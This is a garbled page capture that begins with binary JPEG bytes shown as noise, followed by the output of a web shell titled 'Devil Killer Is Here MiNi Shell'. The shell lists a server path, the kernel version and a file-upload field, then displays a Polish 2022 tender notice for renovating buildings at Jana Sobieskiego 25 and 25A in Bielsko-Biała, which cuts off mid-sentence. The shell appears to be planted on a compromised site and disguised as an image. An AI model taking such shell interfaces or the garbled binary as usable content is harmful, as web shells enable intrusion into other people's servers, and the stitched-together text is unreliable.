JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220506/0014836201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont i termomodernizacja budynków wielorodzinnych przy ul. Jana Sobieskiego 25 i 25A w Bielsku- Białej w podziale na II części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Bielsko-Biała - Zakład Gospodarki Mieszkaniowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 070019077</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lipnicka 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">334990600</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">334990611</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@zgm.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgm.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont i termomodernizacja budynków wielorodzinnych przy ul. Jana Sobieskiego 25 i 25A w Bielsku- Białej w podziale na II części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-53d1d2bf-cd20-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00148362</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00028920/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Remont i termomodernizacja budynków wielorodzinnych przy ul. Jana Sobieskiego 25 i 25A w Bielsku-Białej w podziale na II części: część 1 budynek nr 25; część 2 budynek nr 25a</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Poprawa efektywności energetycznej wielorodzinnych budynków mieszkalnych w Bielsku-Białej – etap III” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/84cffd57-299d-4695-ae82-a4cd3eefb99c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/;<br/>2) ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal ,<br/>3) poczty elektronicznej pod adresem przetargi@zgm.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz<br/>do „Formularza do komunikacji”. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich<br/>użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do<br/>komunikacji” jako załączniki. Zamawiający dopuszcza i rekomenduje składanie<br/>dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt 1 lit. b)<br/>adres email 1 Sposób sporządzenia dokumentów elektronicznych musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz.<br/>2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r.<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający zrealizował obowiązek informacyjny w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGM/DZ-DN/84/2022/ADM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> części I zamówienia - remont i termomodernizacja budynku wielorodzinnego przy ul. Jana<br/>Sobieskiego 25. Wykonanie robót remontowych wraz z termomodernizacją budynków zostało<br/>podzielone na dwa etapy, których terminy realizacji zakończyć powinny się odpowiednio:<br/>I etap do 15.12.2022r , oraz etap II do 15.05.2023r.<br/>Roboty remontowe wykonane w I etapie obejmują roboty budowlane (dach, konstrukcje,<br/>konstrukcje stalowe, roboty murowane , roboty izolacyjne, tynkowe, podłoża i posadzki,<br/>roboty z prefabrykatów gipsowych , prace konserwatorskie. Roboty dla instalacji<br/>elektrycznych ogólnych oraz elektrycznych w lokalach mieszkalnych, instalacji sanitarnych.<br/>prace związane z zagospodarowaniem terenu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie poniższych kryteriów:<br/>1) cena ofertowa brutto („KC”) 1) - waga 60%<br/>2) okres rękojmi i gwarancji („KOrg”) 2) - waga 25%<br/>3) kara umowna za zwłokę w wykonaniu zamówienia („KKu1”) 3) - waga 8%<br/>4) kara umowna za zwłokę w usunięcia wad i/lub usterek w okresie rękojmi i<br/>gwarancji („KKu2”) 4) - waga 7%<br/>1) do oceny ofert Zamawiający przyjmie cenę brutto oferty za całość zamówienia.<br/>2) okres rękojmi i gwarancji - wybrany przez Wykonawcę, z tym, że nie krótszy niż 60 miesięcy oraz nie<br/>dłuższy niż 84 miesięcy, licząc od daty bezusterkowego końcowego protokołu odbioru robót.<br/>Oferty z okresem krótszym niż okres wymagany 60 miesięcy będą odrzucone na podstawie art. 226 ust.<br/>1 pkt 5 ustawy, jako niezgodne z warunkami zamówienia.<br/>W przypadku ofert z okresem dłuższym niż okres maksymalny 84 miesięcy, Zamawiający przyjmie do<br/>oceny oferty okres 84 miesięcy.<br/>3) Kara umowna za zwłokę w wykonaniu zamówienia - kwota wybrana przez Wykonawcę, z tym, że nie<br/>niższa niż 100,00 zł oraz nie wyższa niż 400,00 zł.<br/>Oferty z kwotą kary umownej niższą niż 100,00 zł będą odrzucone na podstawie art. 226 ust. 1 pkt 5<br/>ustawy, jako niezgodne z warunkami zamówienia.<br/>W przypadku ofert z kwotą kary umownej wyższą niż 400,00 zł, Zamawiający przyjmie do oceny karę<br/>umowną 400,00 zł.<br/>4) Kara umowna za zwłokę w usunięcia wad i/lub usterek w okresie rękojmi i gwarancji - kwota wybrana<br/>przez Wykonawcę, z tym, że nie niższa niż 50,00 zł oraz nie wyższa niż 100,00 zł.<br/>Oferty z kwotą kary umownej niższą niż 50,00 zł będą odrzucone na podstawie art. 226 ust. 1 pkt 5<br/>ustawy, jako niezgodne ze specyfikacją.<br/>W przypadku ofert z kwotą kary umownej wyższą niż 100,00 zł, Zamawiający przyjmie do oceny karęumowną 100,00 zł.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kara umowna za zwłokę w wykonaniu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">8</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kara umowna za zwłokę w usunięcia wad i/lub usterek w okresie rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">7</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> części II zamówienia remont i termomodernizacja budynku wielorodzinnego przy ul. Jana<br/>Sobieskiego 25 A. Wykonanie robót remontowych wraz z termomodernizacją budynków zostało<br/>podzielone na dwa etapy, których terminy realizacji zakończyć powinny się odpowiednio: I etap do<br/>15.12.2022r , oraz etap II do 15.05.2023r.<br/>Roboty remontowe wykonane w I etapie obejmują roboty budowlane (roboty betonowe, roboty murowe,<br/>elementy kowalsko-ślusarskie, roboty stolarskie, roboty izolacyjne), roboty ziemne związane z izolacja<br/>budynku, instalacje elektryczne, instalacje sanitarne<br/>Roboty remontowe wykonane w II etapie obejmują roboty budowlane (dach, roboty tynkowe,<br/>podłoża i posadzki, roboty malarskie, tynki i okładziny zewnętrzne, prace konserwatorskie). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie poniższych kryteriów:<br/>1) cena ofertowa brutto („KC”) 1) - waga 60%<br/>2) okres rękojmi i gwarancji („KOrg”) 2) - waga 25%<br/>3) kara umowna za zwłokę w wykonaniu zamówienia („KKu1”) 3) - waga 8%<br/>4) kara umowna za zwłokę w usunięcia wad i/lub usterek w okresie rękojmi i<br/>gwarancji („KKu2”) 4) - waga 7%<br/>1) do oceny ofert Zamawiający przyjmie cenę brutto oferty za całość zamówienia.<br/>2) okres rękojmi i gwarancji - wybrany przez Wykonawcę, z tym, że nie krótszy niż 60 miesięcy oraz nie<br/>dłuższy niż 84 miesięcy, licząc od daty bezusterkowego końcowego protokołu odbioru robót.<br/>Oferty z okresem krótszym niż okres wymagany 60 miesięcy będą odrzucone na podstawie art. 226 ust.<br/>1 pkt 5 ustawy, jako niezgodne z warunkami zamówienia.<br/>W przypadku ofert z okresem dłuższym niż okres maksymalny 84 miesięcy, Zamawiający przyjmie do<br/>oceny oferty okres 84 miesięcy.<br/>3) Kara umowna za zwłokę w wykonaniu zamówienia - kwota wybrana przez Wykonawcę, z tym, że nie<br/>niższa niż 100,00 zł oraz nie wyższa niż 400,00 zł.<br/>Oferty z kwotą kary umownej niższą niż 100,00 zł będą odrzucone na podstawie art. 226 ust. 1 pkt 5<br/>ustawy, jako niezgodne z warunkami zamówienia.<br/>W przypadku ofert z kwotą kary umownej wyższą niż 400,00 zł, Zamawiający przyjmie do oceny karę<br/>umowną 400,00 zł.<br/>4) Kara umowna za zwłokę w usunięcia wad i/lub usterek w okresie rękojmi i gwarancji - kwota wybrana<br/>przez Wykonawcę, z tym, że nie niższa niż 50,00 zł oraz nie wyższa niż 100,00 zł.<br/>Oferty z kwotą kary umownej niższą niż 50,00 zł będą odrzucone na podstawie art. 226 ust. 1 pkt 5<br/>ustawy, jako niezgodne ze specyfikacją.<br/>W przypadku ofert z kwotą kary umownej wyższą niż 100,00 zł, Zamawiający przyjmie do oceny karęumowną 100,00 zł.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kara umowna za zwłokę w wykonaniu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">8</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kara umowna za zwłokę w usunięcia wad i/lub usterek w okresie rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">7</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> odniesieniu do warunków udziału w postępowaniu dotyczących zdolności technicznej lub<br/>zawodowej (112 ust. 2 pkt 4 ustawy) Zamawiający wymaga, aby Wykonawca spełniał minimalne<br/>warunki umożliwiające realizację zamówienia na odpowiednim poziomie jakości, poprzez:<br/>1) Wykazanie, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy, to<br/>w tym okresie, wykonał należycie i potwierdził ich wykonanie dowodami, dwie roboty budowlane<br/>w budynkach wielolokalowych, polegające na budowie i/lub przebudowie i/lub remoncie,<br/>o łącznej wartości brutto nie niższej niż:<br/>a) 500 000,00 zł brutto – w przypadku oferty złożonej na część 2 zamówienia, w tym co najmniej jedną robotę budowlaną o wartości brutto nie niższej niż 400 000,00 zł (dla<br/>każdej z części) polegającą na przebudowie i/lub remoncie budynku wielolokalowego<br/>podlegającego ochronie konserwatorskiej w rozumieniu ustawy z dnia 23.07.2003r. o ochronie<br/>zabytków i opiece nad zabytkami (tj. Dz. U. z 2021r. poz. 710 z późn. zm. )<br/>2) wykazanie, że dysponuje co najmniej:<br/>a) 1 osobą przewidzianą do kierowania robotami (kierownik budowy), posiadającą<br/>uprawnienia do kierowania robotami budowlanymi w specjalności 